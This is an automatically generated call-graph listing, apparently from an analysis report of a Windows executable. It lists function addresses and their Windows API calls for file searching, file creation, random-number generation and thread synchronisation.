38774->38771 38774->38773 38779 7ff7d79e2721 38774->38779 39035 7ff7d79e3144 9 API calls 2 library calls 38774->39035 39036 7ff7d79dcf34 10 API calls 38774->39036 39037 7ff7d79dc95c 126 API calls 38774->39037 38776 7ff7d79e2684 SetLastError 38776->38774 39038 7ff7d79dcf14 10 API calls 38779->39038 38782 7ff7d79c161c 48 API calls 38781->38782 38783 7ff7d79cb719 38782->38783 38784 7ff7d79f8d38 48 API calls 38783->38784 38784->38528 38785->38530 38786->38531 38787->38532 38789 7ff7d79f9131 38788->38789 38790 7ff7d79f8fcf 38788->38790 38789->38507 38796 7ff7d79f905d 38790->38796 39039 7ff7d79dca6c 48 API calls 3 library calls 38790->39039 38791 7ff7d79f90e0 38791->38789 38792 7ff7d79e2574 126 API calls 38791->38792 38792->38789 38793 7ff7d79c161c 48 API calls 38793->38791 38795 7ff7d79f904c 39040 7ff7d79dca40 61 API calls _CxxThrowException 38795->39040 38796->38791 38796->38793 38798->38539 38800 7ff7d79cb8f8 CharToOemA 38799->38800 38800->38543 38801->38544 38802->38549 38803->38551 38804->38553 38805->38555 38806->38559 38807->38560 38808->38563 38809->38569 38810->38571 38811->38575 38812->38572 38814 7ff7d79c161c 48 API calls 38813->38814 38815 7ff7d79cbaf2 38814->38815 38815->38578 38815->38580 38815->38583 38816->38517 38817->38521 38818->38523 38819->38506 38864 7ff7d79d901c CryptAcquireContextW 38820->38864 38824 7ff7d79d9c2a 38825 7ff7d7a09ce4 8 API calls 38824->38825 38826 7ff7d79d9c49 38825->38826 38827 7ff7d7a09b70 8 API calls 38826->38827 38828 7ff7d79d9c5b memcpy_s 38827->38828 38829 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 38828->38829 38830 7ff7d79cac34 38829->38830 38830->38650 38832 7ff7d79f8efc 38831->38832 38833 7ff7d79f8d00 48 API calls 38832->38833 38834 7ff7d79cad24 38832->38834 38833->38832 38834->38669 38836 7ff7d79cae60 38835->38836 38837 7ff7d7a09d15 memcpy_s 38835->38837 38839 7ff7d7a09b70 38836->38839 38837->38836 38880 7ff7d7a09d74 38837->38880 38842 7ff7d7a09bad memcpy_s 38839->38842 38843 7ff7d7a09bd9 memcpy_s 38839->38843 38840 7ff7d7a09d74 8 API calls 38841 7ff7d79cae6d 38840->38841 38841->38714 38842->38843 38844 7ff7d7a09d74 8 API calls 38842->38844 38843->38840 38844->38843 38846 7ff7d79f8eac 38845->38846 38847 7ff7d79f8d00 48 API calls 38846->38847 38848 7ff7d79cb137 38846->38848 38847->38846 38848->38721 38849->38687 38850->38697 38851->38699 38852->38698 38853->38701 38854->38704 38855->38726 38856->38727 38857->38736 38858->38746 38859->38651 38861 7ff7d79f72dd 38860->38861 38862 7ff7d79f7304 38861->38862 38884 7ff7d7a1a480 38861->38884 38862->38746 38865 7ff7d79d907e 38864->38865 38866 7ff7d79d9057 CryptGenRandom CryptReleaseContext 38864->38866 38868 7ff7d79d9c9c 11 API calls 38865->38868 38866->38865 38867 7ff7d79d9089 38866->38867 38869 7ff7d79d9c9c 38867->38869 38868->38867 38874 7ff7d7a0c0a8 GetSystemTime SystemTimeToFileTime 38869->38874 38871 7ff7d79d9cc5 38877 7ff7d7a22d74 38871->38877 38875 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 38874->38875 38876 7ff7d7a0c0f1 38875->38876 38876->38871 38878 7ff7d79d9cd7 38877->38878 38879 7ff7d7a22d8b QueryPerformanceCounter 38877->38879 38878->38824 38879->38878 38881 7ff7d7a09dbc 38880->38881 38881->38881 38882 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 38881->38882 38883 7ff7d7a09f40 38882->38883 38883->38837 38885 7ff7d7a1a444 38884->38885 38886 7ff7d7a1a47a 38885->38886 38890 7ff7d7a236c0 38885->38890 38893 7ff7d7a1b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38885->38893 38894 7ff7d7a1b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38885->38894 38886->38862 38895 7ff7d7a23700 38890->38895 38900 7ff7d7a26938 EnterCriticalSection 38895->38900 38897 7ff7d7a2370d 38898 7ff7d7a26998 fflush LeaveCriticalSection 38897->38898 38899 7ff7d7a236d2 38898->38899 38899->38885 38904 7ff7d79c161c 38901->38904 38903 7ff7d79cb601 38903->38505 38903->38506 38903->38750 38905 7ff7d79c1640 38904->38905 38914 7ff7d79c16aa memcpy_s 38904->38914 38906 7ff7d79c166d 38905->38906 38915 7ff7d79dca6c 48 API calls 3 library calls 38905->38915 38909 7ff7d79c16d4 38906->38909 38910 7ff7d79c168e 38906->38910 38908 7ff7d79c1661 38916 7ff7d79dcb64 8 API calls 38908->38916 38909->38914 38918 7ff7d79dcb64 8 API calls 38909->38918 38910->38914 38917 7ff7d79dcb64 8 API calls 38910->38917 38914->38903 38915->38908 38920 7ff7d79d9143 38919->38920 38921 7ff7d7a07e95 38919->38921 38920->38756 38939 7ff7d7a07ec8 38921->38939 38924 7ff7d79d9920 38923->38924 38934 7ff7d79d9b45 38923->38934 38927 7ff7d79d996d 38924->38927 38929 7ff7d79d9b75 38924->38929 38971 7ff7d7a07da8 38924->38971 38925 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 38926 7ff7d79d9b61 38925->38926 38926->38758 38978 7ff7d79da0f4 38927->38978 38931 7ff7d7a07f24 68 API calls 38929->38931 38933 7ff7d79d9acb 38931->38933 38932 7ff7d79d99d0 38932->38932 38994 7ff7d7a07f24 38932->38994 38933->38933 38933->38934 39008 7ff7d7a04ea8 8 API calls _UnwindNestedFrames 38933->39008 38934->38925 38937->38758 38938->38758 38940 7ff7d7a07efa memcpy_s 38939->38940 38945 7ff7d7a07fb5 38940->38945 38953 7ff7d7a0b3f0 38940->38953 38943 7ff7d7a0805c GetCurrentProcessId 38944 7ff7d7a08034 38943->38944 38944->38920 38945->38943 38947 7ff7d7a07ff1 38945->38947 38946 7ff7d7a07f7e GetProcAddressForCaller GetProcAddress 38946->38945 38947->38944 38962 7ff7d79dca6c 48 API calls 3 library calls 38947->38962 38949 7ff7d7a0801f 38963 7ff7d79dcda4 10 API calls 2 library calls 38949->38963 38951 7ff7d7a08027 38964 7ff7d79dca40 61 API calls _CxxThrowException 38951->38964 38965 7ff7d7a1a5a0 38953->38965 38956 7ff7d7a0b42c 38967 7ff7d79f48bc 38956->38967 38957 7ff7d7a0b428 38959 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 38957->38959 38961 7ff7d7a07f72 38959->38961 38961->38945 38961->38946 38962->38949 38963->38951 38964->38944 38966 7ff7d7a0b3fc GetSystemDirectoryW 38965->38966 38966->38956 38966->38957 38968 7ff7d79f48cb setbuf 38967->38968 38969 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 38968->38969 38970 7ff7d79f493a LoadLibraryW 38969->38970 38970->38957 38972 7ff7d7a07e74 68 API calls 38971->38972 38973 7ff7d7a07ddc 38972->38973 38974 7ff7d7a07e74 68 API calls 38973->38974 38975 7ff7d7a07def 38974->38975 38976 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 38975->38976 38977 7ff7d7a07e43 38976->38977 38977->38924 38982 7ff7d79da15c memcpy_s 38978->38982 38979 7ff7d79da358 39031 7ff7d7a1a774 8 API calls __report_securityfailure 38979->39031 38981 7ff7d79da352 39030 7ff7d7a1a774 8 API calls __report_securityfailure 38981->39030 38982->38979 38982->38981 38985 7ff7d79da192 38982->38985 38986 7ff7d79da34d 38982->38986 38984 7ff7d79da35e 39009 7ff7d79d9dd8 38985->39009 39029 7ff7d7a1a774 8 API calls __report_securityfailure 38986->39029 38989 7ff7d79da1d9 38990 7ff7d79d9dd8 8 API calls 38989->38990 38991 7ff7d79da2f1 38989->38991 38990->38989 38992 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 38991->38992 38993 7ff7d79da33b 38992->38993 38993->38932 38995 7ff7d7a07fb5 38994->38995 38996 7ff7d7a07f5e 38994->38996 38999 7ff7d7a0805c GetCurrentProcessId 38995->38999 39002 7ff7d7a07ff1 38995->39002 38996->38995 38997 7ff7d7a0b3f0 10 API calls 38996->38997 38998 7ff7d7a07f72 38997->38998 38998->38995 39001 7ff7d7a07f7e GetProcAddressForCaller GetProcAddress 38998->39001 39000 7ff7d7a08034 38999->39000 39000->38933 39001->38995 39002->39000 39032 7ff7d79dca6c 48 API calls 3 library calls 39002->39032 39004 7ff7d7a0801f 39033 7ff7d79dcda4 10 API calls 2 library calls 39004->39033 39006 7ff7d7a08027 39034 7ff7d79dca40 61 API calls _CxxThrowException 39006->39034 39008->38934 39010 7ff7d79d9e46 39009->39010 39015 7ff7d79d9e6e memcpy_s 39009->39015 39011 7ff7d7a09ce4 8 API calls 39010->39011 39012 7ff7d79d9e5e 39011->39012 39016 7ff7d7a09b70 8 API calls 39012->39016 39013 7ff7d79d9e85 39014 7ff7d7a09ce4 8 API calls 39013->39014 39017 7ff7d79d9f97 39014->39017 39015->39013 39018 7ff7d7a09ce4 8 API calls 39015->39018 39016->39015 39019 7ff7d7a09b70 8 API calls 39017->39019 39018->39013 39020 7ff7d79d9fa8 memcpy_s 39019->39020 39021 7ff7d79d9fb4 39020->39021 39023 7ff7d7a09ce4 8 API calls 39020->39023 39022 7ff7d7a09ce4 8 API calls 39021->39022 39024 7ff7d79da0bb 39022->39024 39023->39021 39025 7ff7d7a09b70 8 API calls 39024->39025 39026 7ff7d79da0c9 39025->39026 39027 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39026->39027 39028 7ff7d79da0d8 39027->39028 39028->38989 39029->38981 39030->38979 39031->38984 39032->39004 39033->39006 39034->39000 39035->38776 39037->38774 39039->38795 39040->38796 39042 7ff7d79e1c37 39041->39042 39043 7ff7d79e1c3b 39041->39043 39042->38596 39043->39042 39044 7ff7d79e1c5d 39043->39044 39052 7ff7d79e2d6c 12 API calls 2 library calls 39044->39052 39047 7ff7d79e194c 39046->39047 39048 7ff7d79e1964 39046->39048 39047->39048 39050 7ff7d79e1958 FindCloseChangeNotification 39047->39050 39049 7ff7d79e1988 39048->39049 39053 7ff7d79dc9d0 10 API calls 39048->39053 39049->38596 39050->39048 39052->39042 39053->39049 39054 7ff7d79c1884 39186 7ff7d79f34e4 39054->39186 39057 7ff7d79f34e4 CompareStringW 39059 7ff7d79c18a6 39057->39059 39058 7ff7d79c1926 39060 7ff7d79c195b 39058->39060 39250 7ff7d79f3f98 63 API calls 2 library calls 39058->39250 39061 7ff7d79f34e4 CompareStringW 39059->39061 39067 7ff7d79c18b9 39059->39067 39068 7ff7d79c1970 39060->39068 39251 7ff7d79e2ed8 100 API calls 3 library calls 39060->39251 39061->39067 39065 7ff7d79c1915 39249 7ff7d79dca40 61 API calls _CxxThrowException 39065->39249 39067->39058 39248 7ff7d79c1168 8 API calls 2 library calls 39067->39248 39069 7ff7d79c19b8 39068->39069 39252 7ff7d7a049f4 48 API calls 39068->39252 39190 7ff7d79c5450 39069->39190 39071 7ff7d79c19b0 39253 7ff7d79d8444 54 API calls fflush 39071->39253 39077 7ff7d79c72c4 76 API calls 39078 7ff7d79c1a12 39077->39078 39079 7ff7d79c1ae6 39078->39079 39080 7ff7d79c1b04 39078->39080 39224 7ff7d79c7514 39079->39224 39228 7ff7d79d6c94 39080->39228 39083 7ff7d79c1af2 39084 7ff7d79c7514 72 API calls 39083->39084 39085 7ff7d79c1aff 39084->39085 39086 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39085->39086 39087 7ff7d79c2f97 39086->39087 39088 7ff7d79c1b13 39244 7ff7d79c7148 39088->39244 39090 7ff7d79c1c71 39091 7ff7d79c1ca7 39090->39091 39092 7ff7d79c63e8 8 API calls 39090->39092 39094 7ff7d79c1cd5 39091->39094 39095 7ff7d79c1ce4 39091->39095 39093 7ff7d79c1c91 39092->39093 39096 7ff7d79c49b8 99 API calls 39093->39096 39097 7ff7d7a1a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39094->39097 39098 7ff7d7a1a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39095->39098 39099 7ff7d79c1c9d 39096->39099 39101 7ff7d79c1cee 39097->39101 39098->39101 39100 7ff7d79c63e8 8 API calls 39099->39100 39100->39091 39102 7ff7d79c1d50 39101->39102 39104 7ff7d7a0de30 72 API calls 39101->39104 39103 7ff7d7a1a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39102->39103 39105 7ff7d79c1d62 39103->39105 39104->39102 39106 7ff7d7a0dbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39105->39106 39107 7ff7d79c1d7b 39105->39107 39106->39107 39108 7ff7d7a12bcc 66 API calls 39107->39108 39109 7ff7d79c1dba 39108->39109 39182 7ff7d79eae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39109->39182 39110 7ff7d79c1e1c 39112 7ff7d79c10c0 8 API calls 39110->39112 39114 7ff7d79c1e5d 39110->39114 39111 7ff7d79c1dde std::bad_alloc::bad_alloc 39111->39110 39113 7ff7d7a1ba34 _CxxThrowException RtlPcToFileHeader RaiseException 39111->39113 39112->39114 39113->39110 39115 7ff7d79ca410 159 API calls 39114->39115 39180 7ff7d79c1ef4 39114->39180 39115->39180 39116 7ff7d79c2ccc 39117 7ff7d79c2d0c 39116->39117 39181 7ff7d79e8c80 72 API calls 39116->39181 39118 7ff7d7a0de30 72 API calls 39117->39118 39125 7ff7d79c2d21 39117->39125 39118->39125 39119 7ff7d79c2d86 39127 7ff7d7a049f4 48 API calls 39119->39127 39159 7ff7d79c2dd0 39119->39159 39120 7ff7d7a049f4 48 API calls 39179 7ff7d79c2005 39120->39179 39121 7ff7d79e6688 48 API calls 39121->39180 39122 7ff7d79d8444 54 API calls 39122->39179 39123 7ff7d79c5e70 169 API calls 39123->39179 39124 7ff7d79c80e4 192 API calls 39124->39159 39125->39119 39128 7ff7d7a049f4 48 API calls 39125->39128 39126 7ff7d79ca504 208 API calls 39126->39159 39130 7ff7d79c2d9e 39127->39130 39132 7ff7d79c2d6c 39128->39132 39129 7ff7d79c5928 237 API calls 39129->39179 39134 7ff7d79d8444 54 API calls 39130->39134 39131 7ff7d79e7c7c 127 API calls 39131->39159 39136 7ff7d7a049f4 48 API calls 39132->39136 39133 7ff7d79ca410 159 API calls 39133->39180 39135 7ff7d79c2da6 39134->39135 39144 7ff7d79e1c24 12 API calls 39135->39144 39140 7ff7d79c2d79 39136->39140 39137 7ff7d79de21c 63 API calls 39137->39179 39138 7ff7d79c1168 8 API calls 39138->39159 39139 7ff7d79cb540 147 API calls 39139->39180 39142 7ff7d79d8444 54 API calls 39140->39142 39141 7ff7d79ce6c8 157 API calls 39141->39180 39142->39119 39143 7ff7d79e65b4 48 API calls 39143->39180 39144->39159 39145 7ff7d7a0ae50 71 API calls 39150 7ff7d79c2e39 39145->39150 39146 7ff7d79e4554 16 API calls 39146->39180 39147 7ff7d79e1998 138 API calls 39147->39180 39148 7ff7d79c33b4 64 API calls 39148->39159 39149 7ff7d79c5db4 46 API calls 39149->39180 39150->39145 39151 7ff7d79dca40 61 API calls 39150->39151 39150->39159 39151->39159 39152 7ff7d79c6188 231 API calls 39152->39159 39153 7ff7d79e1930 11 API calls 39153->39180 39154 7ff7d79c3f74 138 API calls 39154->39159 39155 7ff7d79cb540 147 API calls 39155->39179 39156 7ff7d79e7c7c 127 API calls 39156->39180 39157 7ff7d79fba9c 195 API calls 39157->39159 39158 7ff7d7a049f4 48 API calls 39158->39159 39159->39124 39159->39126 39159->39131 39159->39138 39159->39148 39159->39150 39159->39152 39159->39154 39159->39157 39159->39158 39161 7ff7d79d8444 54 API calls 39159->39161 39160 7ff7d79c5004 49 API calls 39160->39180 39161->39159 39162 7ff7d79ca4d0 12 API calls 39162->39180 39163 7ff7d79c571c 12 API calls 39163->39180 39164 7ff7d79e1e80 15 API calls 39164->39180 39165 7ff7d79c1168 8 API calls 39165->39180 39166 7ff7d7a0d48c 58 API calls 39166->39180 39167 7ff7d79c5e70 169 API calls 39167->39180 39168 7ff7d7a0c0a8 10 API calls 39168->39180 39169 7ff7d79d9be0 14 API calls 39169->39180 39170 7ff7d79e6378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39170->39180 39171 7ff7d79f97f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 39171->39180 39172 7ff7d79dcbd0 75 API calls 39172->39180 39173 7ff7d79e18ac 15 API calls 39173->39180 39174 7ff7d79e5c0c 237 API calls 39174->39180 39175 7ff7d79e5d40 237 API calls 39175->39180 39176 7ff7d7a0b6d0 73 API calls 39176->39179 39177 7ff7d79c6114 216 API calls 39177->39180 39178 7ff7d79e5708 237 API calls 39178->39180 39179->39120 39179->39122 39179->39123 39179->39129 39179->39137 39179->39155 39179->39176 39179->39180 39180->39116 39180->39121 39180->39133 39180->39139 39180->39141 39180->39143 39180->39146 39180->39147 39180->39149 39180->39153 39180->39156 39180->39160 39180->39162 39180->39163 39180->39164 39180->39165 39180->39166 39180->39167 39180->39168 39180->39169 39180->39170 39180->39171 39180->39172 39180->39173 39180->39174 39180->39175 39180->39177 39180->39178 39180->39179 39183 7ff7d79ea250 237 API calls 39180->39183 39184 7ff7d79d0d60 237 API calls 39180->39184 39185 7ff7d79eaae0 237 API calls 39180->39185 39181->39117 39182->39111 39183->39180 39184->39179 39185->39179 39187 7ff7d79f34f6 39186->39187 39188 7ff7d79c1893 39187->39188 39254 7ff7d7a0dac0 CompareStringW 39187->39254 39188->39057 39188->39067 39191 7ff7d79c546f setbuf 39190->39191 39193 7ff7d79c554a memcpy_s 39191->39193 39208 7ff7d79c5588 memcpy_s 39191->39208 39194 7ff7d7a0c0a8 10 API calls 39193->39194 39196 7ff7d79c5576 39194->39196 39195 7ff7d79c5583 39263 7ff7d79c6eb8 39195->39263 39274 7ff7d79c681c 54 API calls 2 library calls 39196->39274 39200 7ff7d79c56e9 39270 7ff7d7a06f68 39200->39270 39202 7ff7d79c56f6 39203 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39202->39203 39204 7ff7d79c19df 39203->39204 39210 7ff7d79c72c4 39204->39210 39208->39195 39255 7ff7d7a07a24 39208->39255 39275 7ff7d79c3210 26 API calls 39208->39275 39276 7ff7d79d7088 10 API calls 39208->39276 39277 7ff7d79c571c 39208->39277 39285 7ff7d79d4380 14 API calls 39208->39285 39286 7ff7d79c681c 54 API calls 2 library calls 39208->39286 39211 7ff7d79c72eb 39210->39211 39383 7ff7d79d88dc 39211->39383 39213 7ff7d79c7302 39387 7ff7d79f915c 39213->39387 39215 7ff7d79c730f 39399 7ff7d79f7044 39215->39399 39218 7ff7d7a1a444 new 4 API calls 39219 7ff7d79c73e3 39218->39219 39220 7ff7d79c73f5 memcpy_s 39219->39220 39404 7ff7d79e894c 39219->39404 39222 7ff7d79d9be0 14 API calls 39220->39222 39223 7ff7d79c1a01 39222->39223 39223->39077 39225 7ff7d79c7539 39224->39225 39430 7ff7d79f922c 39225->39430 39229 7ff7d79d6d45 39228->39229 39230 7ff7d79d6cbc 39228->39230 39231 7ff7d79d6d83 39229->39231 39235 7ff7d79d6d69 39229->39235 39466 7ff7d79f9f78 8 API calls 2 library calls 39229->39466 39232 7ff7d79d6cd9 39230->39232 39461 7ff7d79f9f78 8 API calls 2 library calls 39230->39461 39231->39088 39234 7ff7d79d6cf3 39232->39234 39462 7ff7d79f9f78 8 API calls 2 library calls 39232->39462 39241 7ff7d79d6d0d 39234->39241 39463 7ff7d79f9f78 8 API calls 2 library calls 39234->39463 39235->39231 39467 7ff7d79f9f78 8 API calls 2 library calls 39235->39467 39240 7ff7d79d6d2b 39240->39231 39465 7ff7d79f9f78 8 API calls 2 library calls 39240->39465 39241->39240 39464 7ff7d79f9f78 8 API calls 2 library calls 39241->39464 39245 7ff7d79c7162 39244->39245 39246 7ff7d79c7167 39244->39246 39468 7ff7d79c6c64 130 API calls _UnwindNestedFrames 39245->39468 39248->39065 39249->39058 39250->39060 39251->39068 39252->39071 39253->39069 39254->39188 39256 7ff7d7a07a4f 39255->39256 39261 7ff7d7a07a59 39255->39261 39256->39208 39257 7ff7d7a07a7c 39319 7ff7d7a0b6d0 73 API calls _Init_thread_footer 39257->39319 39260 7ff7d7a07b1c 60 API calls 39260->39261 39261->39256 39261->39257 39261->39260 39287 7ff7d7a071fc 39261->39287 39320 7ff7d79d41b0 14 API calls 2 library calls 39261->39320 39264 7ff7d79c6ee6 39263->39264 39269 7ff7d79c6f5c 39263->39269 39376 7ff7d7a09f64 8 API calls memcpy_s 39264->39376 39266 7ff7d79c6efb 39268 7ff7d79c6f2f 39266->39268 39266->39269 39268->39266 39377 7ff7d79c7188 12 API calls 39268->39377 39269->39200 39269->39269 39271 7ff7d7a06f8a 39270->39271 39272 7ff7d7a06fb4 39270->39272 39271->39272 39273 7ff7d79e4538 FindClose 39271->39273 39273->39271 39274->39195 39275->39208 39276->39208 39278 7ff7d79c5742 39277->39278 39284 7ff7d79c575d 39277->39284 39278->39284 39382 7ff7d79f3520 12 API calls 2 library calls 39278->39382 39282 7ff7d79c57fc 39282->39208 39283 7ff7d79f48bc 8 API calls 39283->39282 39378 7ff7d79f3610 39284->39378 39285->39208 39286->39208 39292 7ff7d7a07217 setbuf 39287->39292 39288 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39290 7ff7d7a0776f 39288->39290 39290->39261 39302 7ff7d7a0729c 39292->39302 39310 7ff7d7a0725a 39292->39310 39313 7ff7d7a073c5 39292->39313 39334 7ff7d79e4554 39292->39334 39293 7ff7d7a07453 39295 7ff7d7a07476 39293->39295 39296 7ff7d7a07464 39293->39296 39315 7ff7d7a07496 39295->39315 39331 7ff7d79e4538 39295->39331 39342 7ff7d7a07c38 55 API calls 3 library calls 39296->39342 39299 7ff7d7a07342 39299->39310 39314 7ff7d7a07656 39299->39314 39318 7ff7d7a076ef 39299->39318 39343 7ff7d79d4380 14 API calls 39299->39343 39300 7ff7d7a07471 39300->39295 39304 7ff7d7a073bb 39302->39304 39306 7ff7d7a0732e 39302->39306 39321 7ff7d7a1a444 39304->39321 39306->39299 39307 7ff7d7a0734a 39306->39307 39309 7ff7d7a0737e 39307->39309 39307->39310 39340 7ff7d79d4380 14 API calls 39307->39340 39308 7ff7d79e4554 16 API calls 39308->39310 39309->39310 39341 7ff7d79dcbd0 75 API calls 39309->39341 39310->39288 39327 7ff7d79e45cc 39313->39327 39314->39310 39314->39314 39316 7ff7d7a07723 39314->39316 39314->39318 39315->39308 39315->39310 39344 7ff7d79cc214 8 API calls 2 library calls 39316->39344 39318->39310 39345 7ff7d79e8558 10 API calls 2 library calls 39318->39345 39320->39261 39324 7ff7d7a1a44f 39321->39324 39322 7ff7d7a1a47a 39322->39313 39323 7ff7d7a236c0 new 2 API calls 39323->39324 39324->39322 39324->39323 39346 7ff7d7a1b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 39324->39346 39347 7ff7d7a1b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 39324->39347 39328 7ff7d79e45ed 39327->39328 39329 7ff7d79e46ec 15 API calls 39328->39329 39330 7ff7d79e46b2 39328->39330 39329->39328 39330->39293 39330->39299 39332 7ff7d79e454f 39331->39332 39333 7ff7d79e4549 FindClose 39331->39333 39332->39315 39333->39332 39335 7ff7d79e4570 39334->39335 39336 7ff7d79e4574 39335->39336 39348 7ff7d79e46ec 39335->39348 39336->39302 39339 7ff7d79e458d FindClose 39339->39336 39340->39309 39341->39310 39342->39300 39343->39314 39344->39310 39345->39310 39349 7ff7d79e4705 setbuf 39348->39349 39350 7ff7d79e47a4 FindNextFileW 39349->39350 39351 7ff7d79e4733 FindFirstFileW 39349->39351 39353 7ff7d79e47ae GetLastError 39350->39353 39360 7ff7d79e478b 39350->39360 39352 7ff7d79e4749 39351->39352 39351->39360 39361 7ff7d79f4534 39352->39361 39353->39360 39356 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39359 7ff7d79e4587 39356->39359 39357 7ff7d79e475f FindFirstFileW 39358 7ff7d79e477a GetLastError 39357->39358 39357->39360 39358->39360 39359->39336 39359->39339 39360->39356 39362 7ff7d79f4549 setbuf 39361->39362 39372 7ff7d79f45a2 39362->39372 39373 7ff7d79f472c CharUpperW 39362->39373 39364 7ff7d79f4579 39374 7ff7d79f4760 CharUpperW 39364->39374 39365 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39366 7ff7d79e475b 39365->39366 39366->39357 39366->39358 39368 7ff7d79f4592 39369 7ff7d79f4629 GetCurrentDirectoryW 39368->39369 39370 7ff7d79f459a 39368->39370 39369->39372 39375 7ff7d79f472c CharUpperW 39370->39375 39372->39365 39373->39364 39374->39368 39375->39372 39376->39266 39377->39268 39379 7ff7d79f3626 setbuf wcschr 39378->39379 39380 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39379->39380 39381 7ff7d79c57e1 39380->39381 39381->39282 39381->39283 39382->39284 39384 7ff7d79d8919 39383->39384 39409 7ff7d7a04b14 39384->39409 39386 7ff7d79d8954 memcpy_s 39386->39213 39388 7ff7d79f9199 39387->39388 39389 7ff7d7a1a480 4 API calls 39388->39389 39390 7ff7d79f91be 39389->39390 39391 7ff7d7a1a444 new 4 API calls 39390->39391 39392 7ff7d79f91cf 39391->39392 39393 7ff7d79d88dc 8 API calls 39392->39393 39395 7ff7d79f91e1 39392->39395 39393->39395 39394 7ff7d7a1a444 new 4 API calls 39396 7ff7d79f91f7 39394->39396 39395->39394 39397 7ff7d79f9209 39396->39397 39398 7ff7d79d88dc 8 API calls 39396->39398 39397->39215 39398->39397 39400 7ff7d79d88dc 8 API calls 39399->39400 39401 7ff7d79f7063 39400->39401 39402 7ff7d79f72c0 4 API calls 39401->39402 39403 7ff7d79c7325 39402->39403 39403->39218 39403->39220 39414 7ff7d7a07d80 39404->39414 39410 7ff7d7a04b26 39409->39410 39411 7ff7d7a04b2b 39409->39411 39413 7ff7d7a04b38 8 API calls _UnwindNestedFrames 39410->39413 39411->39386 39413->39411 39421 7ff7d7a08094 39414->39421 39417 7ff7d79e8a44 39418 7ff7d79e8a5a memcpy_s 39417->39418 39425 7ff7d7a0bac4 39418->39425 39422 7ff7d7a0809f 39421->39422 39423 7ff7d7a07ec8 68 API calls 39422->39423 39424 7ff7d79e896e 39423->39424 39424->39417 39428 7ff7d7a0ba70 GetCurrentProcess GetProcessAffinityMask 39425->39428 39429 7ff7d79e89c5 39428->39429 39429->39220 39431 7ff7d79f9245 39430->39431 39438 7ff7d79e6194 39431->39438 39433 7ff7d79f92b1 39434 7ff7d79e6194 72 API calls 39433->39434 39435 7ff7d79f92bd 39434->39435 39436 7ff7d79e6194 72 API calls 39435->39436 39437 7ff7d79f92c9 39436->39437 39439 7ff7d79e61b4 39438->39439 39441 7ff7d79e61bc 39438->39441 39442 7ff7d7a0b850 39439->39442 39441->39433 39449 7ff7d7a0bbfc 39442->39449 39445 7ff7d7a0b898 39453 7ff7d7a0b974 WaitForSingleObject 39445->39453 39446 7ff7d7a0b8b9 DeleteCriticalSection FindCloseChangeNotification CloseHandle 39450 7ff7d7a0b871 ReleaseSemaphore 39449->39450 39451 7ff7d7a0bc0e ResetEvent ReleaseSemaphore 39449->39451 39450->39445 39450->39446 39452 7ff7d7a0b974 65 API calls 39451->39452 39452->39450 39454 7ff7d7a0b8a2 FindCloseChangeNotification 39453->39454 39455 7ff7d7a0b986 GetLastError 39453->39455 39454->39445 39454->39446 39459 7ff7d79dca6c 48 API calls 3 library calls 39455->39459 39457 7ff7d7a0b9a6 39460 7ff7d79dca40 61 API calls _CxxThrowException 39457->39460 39459->39457 39460->39454 39461->39232 39462->39234 39463->39241 39464->39240 39465->39229 39466->39235 39467->39231 39468->39246 39469 7ff7d79c3b53 39470 7ff7d79c3b64 39469->39470 39519 7ff7d79e1e80 39470->39519 39471 7ff7d79c3c09 39531 7ff7d79e23f0 39471->39531 39473 7ff7d79c3bb6 39473->39471 39474 7ff7d79c3c18 39473->39474 39475 7ff7d79c3c01 39473->39475 39536 7ff7d79c8050 157 API calls 39474->39536 39477 7ff7d79e1c24 12 API calls 39475->39477 39477->39471 39478 7ff7d79c3c3d 39537 7ff7d79c8010 13 API calls 39478->39537 39479 7ff7d79c3ccc 39501 7ff7d79c3c90 39479->39501 39544 7ff7d79e2414 61 API calls 39479->39544 39482 7ff7d79c3c45 39485 7ff7d79c3c54 39482->39485 39538 7ff7d79dcba8 75 API calls 39482->39538 39484 7ff7d79c3cf9 39545 7ff7d79e1998 138 API calls 39484->39545 39539 7ff7d79ca9d4 186 API calls wcschr 39485->39539 39489 7ff7d79c3d10 39492 7ff7d79e18ac 15 API calls 39489->39492 39490 7ff7d79c3c5c 39540 7ff7d79c93ac 8 API calls 39490->39540 39492->39501 39493 7ff7d79c3c66 39495 7ff7d79c3c77 39493->39495 39541 7ff7d79dca40 61 API calls _CxxThrowException 39493->39541 39542 7ff7d79c8090 8 API calls 39495->39542 39498 7ff7d79c3c7f 39498->39501 39543 7ff7d79dca40 61 API calls _CxxThrowException 39498->39543 39546 7ff7d7a0d400 48 API calls 39501->39546 39520 7ff7d79e1e95 setbuf 39519->39520 39521 7ff7d79e1ecb CreateFileW 39520->39521 39522 7ff7d79e1f59 GetLastError 39521->39522 39529 7ff7d79e1fb8 39521->39529 39523 7ff7d79f4534 10 API calls 39522->39523 39526 7ff7d79e1f74 39523->39526 39524 7ff7d79e1ff7 39527 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39524->39527 39525 7ff7d79e1fd9 SetFileTime 39525->39524 39528 7ff7d79e1f78 